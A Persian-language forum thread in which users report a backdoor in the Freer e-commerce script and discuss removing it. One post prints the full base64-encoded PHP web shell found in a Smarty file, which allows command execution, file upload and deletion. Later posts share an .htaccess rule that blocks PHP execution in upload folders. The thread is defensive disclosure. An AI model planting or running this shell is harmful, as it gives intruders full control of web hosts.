مشکل جالب در فریرر

**saeid1346** · January 25th, 2016, 00:36

ویرایش شد

**ata3929** · February 4th, 2016, 15:36

نوشته اصلی توسط saeid1346

سلام دوستان
از شما تقاضا دارم اخرین نسخه اسکریپت فریر رو از این سایت که به ظاهر معتبره دانلود کنید

http://freer.ir/virtual/download.php

این مسیر رو پیدا کنید

include/libs/smarty/sysplugins/

فایل
smarty_intemplateparser.php رو باز کنید

و اگر صلاح میدونید توضیحی ارائه بدید بابت این کد پایین !!!!

ویرایش شد...

با این که این قضیه گزارش شده بود بهشون ولی هنوز اصلاح نشده و تاریخ اصلاح فایل 9/1/2016 هستش !!!!

هنوزم چند فایل دیگه مثل این داخل اسکریپت هست

البته شاید سایت این بنده خدا هک شده باشه ولی به هر حال یه شخصی داره سو استفاده میکنه.

کد PHP:


<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYmJkZGEzOWU2JzsNCmlmKG1kNSgkX1JFUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVRPUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID09ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQpe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGhyKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGFyZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDogPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3JtPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXBsb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9mb3JtPic7DQp9')); ?>

- - - Updated - - -

http://forum.iranphp.org/Thread-%D9%...-virtual-freer
خدمت شما

از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد

**yastheme** · February 4th, 2016, 16:36

نوشته اصلی توسط ata3929

از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد

من هم با این روش هک مشابه برخوردکرده ام ولی در خود فایل اصلی موردی نیست؛
دیکد:
http://codepad.org/uLGMnrpc

**s0h3il** · February 27th, 2016, 12:47

فایل

smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!

- - - Updated - - -

نوشته اصلی توسط us12

مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.

از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...

پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...

http://www.softiran.org/view-item/97...safe-pack.html

راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته

**us12** · April 8th, 2016, 21:51

نوشته اصلی توسط s0h3il

فایل

smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!

- - - Updated - - -

راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته

روش نصب : فایل زیپ پکیج را در جایی که فریر نصب است ، اکسترک کنید ...

**saeid1346** · February 4th, 2016, 20:20

هیچیش نیست شما راحت باش فقط یه دسترسی ساده است

فقط توصیه میکنم حتما اصلاحش کنید این بخش از فایل رو برای امنیت خودتون !

- - - Updated - - -

yastheme
همین دیروز فایل اصلاح شده !!! تاریخ تغییر در فایل فشرده ببینید خودتون

به هر حال هاستتون رو بگید حتما اسکن کنن

پست اول ویرایش شد
موفق باشید

**Jai** · February 5th, 2016, 12:32

بله فایل شل بود

من دهنم سرویس شد هرکاری میکردم هاستم اجازه اپلود 1.58 فرییر رو نمیداد ارور شل base64 میزد

گشتم دیدم فایل

smarty_internal_templateparser.php قسمت آخر هستش و پاک کردم رفع شد

**yastheme** · February 17th, 2016, 19:50

ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:

کد PHP:


<FilesMatch "\.(?i:php)$">
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
</FilesMatch>

این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )

**ata3929** · February 17th, 2016, 19:58

نوشته اصلی توسط yastheme

ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:

کد PHP:


<FilesMatch "\.(?i:php)$">
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
</FilesMatch>

این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )

ممنون از توضیحات خوبتون

من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه

و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )

**yastheme** · February 17th, 2016, 20:17

نوشته اصلی توسط ata3929

ممنون از توضیحات خوبتون

من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه

و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )

به هکر ها اجازه آپلود هر گونه فایل مخرب را می دهد،

موضوع: مشکل جالب در فریرر

ابزارهای موضوع

نحوه نمایش موضوع

Hybrid View

مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

تعداد تشکر ها از yastheme به دلیل پست مفید

پاسخ : مشکل جالب در فریرر

پاسخ : مشکل جالب در فریرر

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

مجوز های ارسال و ویرایش